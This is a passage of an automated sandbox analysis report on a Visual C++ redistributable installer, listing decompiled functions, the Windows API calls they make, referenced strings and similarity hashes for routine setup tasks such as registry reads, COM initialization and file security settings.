                                                                          • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,0003744B,00000000,IGNOREDEPENDENCIES,00000000,?,0005B508), ref: 0001DCF6
                                                                          Strings
                                                                          • IGNOREDEPENDENCIES, xrefs: 0001DCAD
                                                                          • Failed to copy the property value., xrefs: 0001DD2A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                          • API String ID: 1825529933-1412343224
                                                                          • Opcode ID: 89dfa94a9367d36257226a35e88314fbb35a20e33dd47de9231b18416be4fbef
                                                                          • Instruction ID: 0fd6ca3e1fce107ae6ca528dc0aaac67a242d4d0d72da6cca32c7b9a89fd4e3f
                                                                          • Opcode Fuzzy Hash: 89dfa94a9367d36257226a35e88314fbb35a20e33dd47de9231b18416be4fbef
                                                                          • Instruction Fuzzy Hash: 0F11A076204215AFDB208F54DC85FEAB7A5FF58320F264676EA189B291C770A890C7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E000554F8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, long _a36) {
                                                                          				char _v8;
                                                                          				signed short _t16;
                                                                          				char _t22;
                                                                          				signed short _t25;
                                                                          
                                                                          				_t22 = 0;
                                                                          				_v8 = 0;
                                                                          				_t16 = E000121A5( &_v8, _a4, 0);
                                                                          				_t25 = _t16;
                                                                          				if(_t25 < 0) {
                                                                          					L8:
                                                                          					if(_v8 != 0) {
                                                                          						E000554EF(_v8);
                                                                          					}
                                                                          					return _t25;
                                                                          				}
                                                                          				_t25 = 0x80004005;
                                                                          				while(_t22 <= _a32) {
                                                                          					if(_t22 != 0) {
                                                                          						Sleep(_a36);
                                                                          					}
                                                                          					__imp__SetNamedSecurityInfoW(_v8, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                          					_t25 =  <=  ? _t16 : _t16 & 0x0000ffff | 0x80070000;
                                                                          					_t22 = _t22 + 1;
                                                                          					if(_t25 < 0) {
                                                                          						continue;
                                                                          					} else {
                                                                          						break;
                                                                          					}
                                                                          				}
                                                                          				if(_t25 < 0) {
                                                                          					E000137D3(_t16, "aclutil.cpp", 0x399, _t25);
                                                                          				}
                                                                          				goto L8;
                                                                          			}








                                                                          APIs
                                                                          • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00028C90,?,00000001,20000004,00000000,00000000,?,00000000), ref: 00055527
                                                                          • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00028C90,?), ref: 00055542
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InfoNamedSecuritySleep
                                                                          • String ID: aclutil.cpp
                                                                          • API String ID: 2352087905-2159165307
                                                                          • Opcode ID: 00034818d2381dd00d85cce22a1dbc05bd67710bf37b7a676018f8188f917c7c
                                                                          • Instruction ID: cacb0f36a974fc14feba22630c8eb41738aeac17181cb15242fe3267dec9950e
                                                                          • Opcode Fuzzy Hash: 00034818d2381dd00d85cce22a1dbc05bd67710bf37b7a676018f8188f917c7c
                                                                          • Instruction Fuzzy Hash: 5F018233800A28BBDF229E94CC15ECF7E6AEF84762F010115BE0566110E6328D60DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 000255D9
                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00025633
                                                                          Strings
                                                                          • Failed to initialize COM on cache thread., xrefs: 000255E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: Failed to initialize COM on cache thread.
                                                                          • API String ID: 3442037557-3629645316
                                                                          • Opcode ID: f9222d3066de48d4fbf7aabef0c9df53f99ed02a4f6eb38ae7da52cc17fc6c92
                                                                          • Instruction ID: 5870a2077fe7c0828b8ee542d00c8aeacc162f66c9475c9fe74bb62572023203
                                                                          • Opcode Fuzzy Hash: f9222d3066de48d4fbf7aabef0c9df53f99ed02a4f6eb38ae7da52cc17fc6c92
                                                                          • Instruction Fuzzy Hash: 43015B72600A19BFCB058BA5DC84DDAF7ADFF08355B408166FA08D7121DB31AE548B94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00053849
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005387C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 3ef6fecae5d4349b86fbc747aaad0bcade8918ee064f3dc3b1f012761a58eae5
                                                                          • Instruction ID: 8c94608af212b758de8fedea3c9df968aad659bf43fbdc9e19ccec6e3d6aa2de
                                                                          • Opcode Fuzzy Hash: 3ef6fecae5d4349b86fbc747aaad0bcade8918ee064f3dc3b1f012761a58eae5
                                                                          • Instruction Fuzzy Hash: 3C012675640315ABEB311A948C04FBB76D8DF407A2F008539FE05EB340CB78CE0597A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 000538D0
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00053903
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 516c67a5c7d574b4ea9049ce2e4c2f927ed145dc845df696af1a11444ff15dbb
                                                                          • Instruction ID: f4c1e805137ef62bfdaa835aee6644e3f3ec2f13884db7700f2212c7701b40d1
                                                                          • Opcode Fuzzy Hash: 516c67a5c7d574b4ea9049ce2e4c2f927ed145dc845df696af1a11444ff15dbb
                                                                          • Instruction Fuzzy Hash: 3701A275A40319BBEB314A948C08FBB77D8EF457A2F104025FD05AB240CBB8DE0457A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E00053AC9(void* __ecx, signed int* _a4) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int* _t24;
                                                                          				void* _t27;
                                                                          
                                                                          				_t22 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t24 = _a4;
                                                                          				 *_t24 =  *_t24 & 0x00000000;
                                                                          				_t27 = E00050E3F(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0x20019,  &_v8);
                                                                          				if(_t27 != 0x80070002) {
                                                                          					if(_t27 < 0) {
                                                                          						L6:
                                                                          						if(_v8 != 0) {
                                                                          							RegCloseKey(_v8);
                                                                          						}
                                                                          						return _t27;
                                                                          					}
                                                                          					_t27 = E00050EEC(_t22, _v8, L"EnableLUA",  &_v12);
                                                                          					if(_t27 == 0x80070002) {
                                                                          						goto L1;
                                                                          					}
                                                                          					if(_t27 >= 0) {
                                                                          						 *_t24 = 0 | _v12 != 0x00000000;
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				L1:
                                                                          				_t27 = 0;
                                                                          				goto L6;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0005396A,?), ref: 00053B3A
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00053AE4
                                                                          • EnableLUA, xrefs: 00053B0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                          • API String ID: 47109696-3551287084
                                                                          • Opcode ID: 8828ccfdbc5468d682a1c01ea4c241c86b15dce7bcd16f0dc6022dc7fbd91542
                                                                          • Instruction ID: 836b03f2d8ecb5b3ee72efab8bf4becc41bf842074ab2cb420fab4995f771a49
                                                                          • Opcode Fuzzy Hash: 8828ccfdbc5468d682a1c01ea4c241c86b15dce7bcd16f0dc6022dc7fbd91542
                                                                          • Instruction Fuzzy Hash: 25017C32C10238EBEB10AAA4C80BBEFFAACDB04762F204565AE01A7151E3755F54D694
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00056754(void* __ecx, struct _FILETIME* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				void* _t10;
                                                                          				struct _FILETIME* _t21;
                                                                          				DWORD _t24;
                                                                          				DWORD _t28;
                                                                          
                                                                          				_t21 = _a4;
                                                                          				_v8 = 0;
                                                                          				if(_t21->dwHighDateTime != 0 ||  *_t21 != 0) {
                                                                          					_t24 = 0x8007000d;
                                                                          					E000137D3(_t10, "atomutil.cpp", 0x427, 0x8007000d);
                                                                          				} else {
                                                                          					_t24 = E000533C8(_a8,  &_v8);
                                                                          					_t28 = _t24;
                                                                          					if(_t28 >= 0) {
                                                                          						if(_t28 != 0) {
                                                                          							 *_t21 = 0;
                                                                          							_t24 = 0;
                                                                          							_t21->dwHighDateTime = 0;
                                                                          						} else {
                                                                          							_t24 = E000585CB(_v8, _t21);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				return _t24;
                                                                          			}









                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 000567B3
                                                                            • Part of subcall function 000585CB: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000586D8
                                                                            • Part of subcall function 000585CB: GetLastError.KERNEL32 ref: 000586E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$ErrorFileFreeLastStringSystem
                                                                          • String ID: atomutil.cpp$clbcatq.dll
                                                                          • API String ID: 211557998-3749116663
                                                                          • Opcode ID: 67ae13b00b70195a947cfde95b7844ed1595dec58154e05fc497846c9a1ca537
                                                                          • Instruction ID: 03d65e6079532771833b0f2fcbcbd99581396bf13d7f765b8cec04ed65589221
                                                                          • Opcode Fuzzy Hash: 67ae13b00b70195a947cfde95b7844ed1595dec58154e05fc497846c9a1ca537
                                                                          • Instruction Fuzzy Hash: 7101A27190461EFBCB209F859981C9FFBB8EF08766B90427AFE0567110D3325E14D790
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E00016418(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t26;
                                                                          
                                                                          				_t22 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t26 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_v12 = _v12 & 0;
                                                                          				E000509BB(_t22, GetCurrentProcess(),  &_v12);
                                                                          				if(_v12 != 0) {
                                                                          					if(E00015BF0(_t22, _a4,  &_v8) >= 0) {
                                                                          						_t26 = E000302F4(_a8, _v8, 0);
                                                                          						if(_t26 < 0) {
                                                                          							_push("Failed to set variant value.");
                                                                          							goto L5;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get 64-bit folder.");
                                                                          						L5:
                                                                          						_push(_t26);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t26;
                                                                          			}







                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0001642A
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                            • Part of subcall function 00015BF0: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00015C77
                                                                          Strings
                                                                          • Failed to get 64-bit folder., xrefs: 0001644D
                                                                          • Failed to set variant value., xrefs: 00016467
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                          • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                          • API String ID: 3109562764-2681622189
                                                                          • Opcode ID: 5eb448e8f3e7e9c001837de7dea57a9a62f77b917c7a136ef8283e01ad181746
                                                                          • Instruction ID: dc0c290479d5f1dceb3e716a7d80337e9fde16ab90ba078e1c46d64fc0a6efc1
                                                                          • Opcode Fuzzy Hash: 5eb448e8f3e7e9c001837de7dea57a9a62f77b917c7a136ef8283e01ad181746
                                                                          • Instruction Fuzzy Hash: 17011232D05628BBDF21A794DC06AEF7A78EB04722F108156FD4066152D7729E84D7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E0004D3D3(void* __ebx, void* __edi, void* __eflags) {
                                                                          				signed int _t37;
                                                                          				void* _t38;
                                                                          
                                                                          				E0003E830(__ebx, __edi, 0x77fc8, 0xc);
                                                                          				_t37 = 0;
                                                                          				 *(_t38 - 0x1c) = 0;
                                                                          				E00048C77( *((intOrPtr*)( *((intOrPtr*)(_t38 + 8)))));
                                                                          				 *((intOrPtr*)(_t38 - 4)) = 0;
                                                                          				if(( *( *((intOrPtr*)(0x7b158 + ( *( *( *(_t38 + 0xc))) >> 6) * 4)) + 0x28 + ( *( *( *(_t38 + 0xc))) & 0x0000003f) * 0x30) & 0x00000001) == 0) {
                                                                          					L3:
                                                                          					 *((intOrPtr*)(E00043E36())) = 9;
                                                                          					_t37 = _t37 | 0xffffffff;
                                                                          				} else {
                                                                          					if(FlushFileBuffers(E00048D4E(_t36)) == 0) {
                                                                          						_t37 = E00043E23();
                                                                          						 *_t37 = GetLastError();
                                                                          						goto L3;
                                                                          					}
                                                                          				}
                                                                          				 *(_t38 - 0x1c) = _t37;
                                                                          				 *((intOrPtr*)(_t38 - 4)) = 0xfffffffe;
                                                                          				E0004D45F();
                                                                          				return E0003E876();
                                                                          			}






                                                                          APIs
                                                                            • Part of subcall function 00048C77: EnterCriticalSection.KERNEL32(?), ref: 00048C92
                                                                          • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0004D41C
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0004D42D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                          • String ID: @Met
                                                                          • API String ID: 4109680722-2381362037
                                                                          • Opcode ID: e2162de5a4137322de8051ef85d4c7af35d4f7e771f5edfd8d1292f9dd02a4f9
                                                                          • Instruction ID: e40ecb537c3daafd56141a198ab0cdd146cf543f5f7fc1c89ad78ee1057ba056
                                                                          • Opcode Fuzzy Hash: e2162de5a4137322de8051ef85d4c7af35d4f7e771f5edfd8d1292f9dd02a4f9
                                                                          • Instruction Fuzzy Hash: F401A771E013049FD710BF78D90969E77A5AF45720F14825AF8149F2E3DB74D9418B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 49%
                                                                          			E00020598(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                          				signed int _v8;
                                                                          				void* _t19;
                                                                          				void* _t24;
                                                                          
                                                                          				_t19 = __edx;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t24 = E00050E3F( *((intOrPtr*)(_a4 + 0x4c)),  *((intOrPtr*)(_a4 + 0x50)), 0x20006,  &_v8);
                                                                          				if(_t24 >= 0) {
                                                                          					_t24 = E0001F09D(_t19, __eflags, _t21, _v8, 1, 0);
                                                                          					__eflags = _t24;
                                                                          					if(_t24 < 0) {
                                                                          						_push("Failed to update resume mode.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to open registration key.");
                                                                          					L4:
                                                                          					_push(_t24);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t24;
                                                                          			}







                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,0003BB7C,00000101,?), ref: 000205EF
                                                                          Strings
                                                                          • Failed to update resume mode., xrefs: 000205D9
                                                                          • Failed to open registration key., xrefs: 000205BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to open registration key.$Failed to update resume mode.
                                                                          • API String ID: 47109696-3366686031
                                                                          • Opcode ID: ad7445141b0900a4b61b12d84f97231a3e1a081bc4ed5ccf1d31e7b5b2cd3bc5
                                                                          • Instruction ID: fc23f7e8d869e2d2f18cedeb12e2a35368176a4de14936d4acb5bf84900c92e8
                                                                          • Opcode Fuzzy Hash: ad7445141b0900a4b61b12d84f97231a3e1a081bc4ed5ccf1d31e7b5b2cd3bc5
                                                                          • Instruction Fuzzy Hash: 75F0FC32941739B7D7225A94DC06FDFB7A9EF00751F140055FA00B6152DB75AF1097D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,0001535E,?,00000000,0001535E,?,?,?), ref: 00053C7F
                                                                          • CoCreateInstance.OLE32(00000000,00000000,00000001,00076F3C,?), ref: 00053C97
                                                                          Strings
                                                                          • Microsoft.Update.AutoUpdate, xrefs: 00053C7A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromInstanceProg
                                                                          • String ID: Microsoft.Update.AutoUpdate
                                                                          • API String ID: 2151042543-675569418
                                                                          • Opcode ID: ec3a3156b9d3f96ba30231cae97aeea250c90a4321159337882d6a140d6300cc
                                                                          • Instruction ID: 9a897ac7c788822ccd31d3370b30ce9c7d94891c7d78b92bc933fbdef678bfbe
                                                                          • Opcode Fuzzy Hash: ec3a3156b9d3f96ba30231cae97aeea250c90a4321159337882d6a140d6300cc
                                                                          • Instruction Fuzzy Hash: 6AF03071A00608BBEB00DBA8DD05AFFBBA8EB48711F404065EA05F7150D675AE048AA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000530BF(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				void* _t12;
                                                                          				intOrPtr* _t15;
                                                                          				void* _t16;
                                                                          
                                                                          				if(_a12 == 0) {
                                                                          					L6:
                                                                          					return 0x80070057;
                                                                          				}
                                                                          				_t15 = _a4;
                                                                          				if(_t15 == 0) {
                                                                          					goto L6;
                                                                          				}
                                                                          				__imp__#2(_a8, _t12);
                                                                          				if(__eax != 0) {
                                                                          					_t16 =  *((intOrPtr*)( *_t15 + 0xbc))(_t15, __eax, _a12);
                                                                          					__imp__#6(__eax);
                                                                          				} else {
                                                                          					_t16 = 0x8007000e;
                                                                          					E000137D3(__eax, "xmlutil.cpp", 0x66, 0x8007000e);
                                                                          				}
                                                                          				return _t16;
                                                                          			}







                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 000530D4
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00053104
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: c4387240c969b82dbcbf4a4dfb9e86a0a9a41d3148fe07f453962f064a670359
                                                                          • Instruction ID: 6420294d7b147dd8bcaeb4c37a10ac326eef203a214be880af4546ee7be6ff7f
                                                                          • Opcode Fuzzy Hash: c4387240c969b82dbcbf4a4dfb9e86a0a9a41d3148fe07f453962f064a670359
                                                                          • Instruction Fuzzy Hash: 72F0B435601A58E7D7315E549C09FABBBA5AF40BA2F144028FD096B210C7759E509AA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E0005336E(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				void* _t12;
                                                                          				intOrPtr* _t15;
                                                                          				void* _t16;
                                                                          
                                                                          				_t15 = _a4;
                                                                          				if(_t15 == 0 || _a12 == 0) {
                                                                          					return 0x80070057;
                                                                          				} else {
                                                                          					__imp__#2(_a8, _t12);
                                                                          					if(__eax != 0) {
                                                                          						_t16 =  *((intOrPtr*)( *_t15 + 0x1c))(_t15, __eax, _a12);
                                                                          						__imp__#6(__eax);
                                                                          					} else {
                                                                          						_t16 = 0x8007000e;
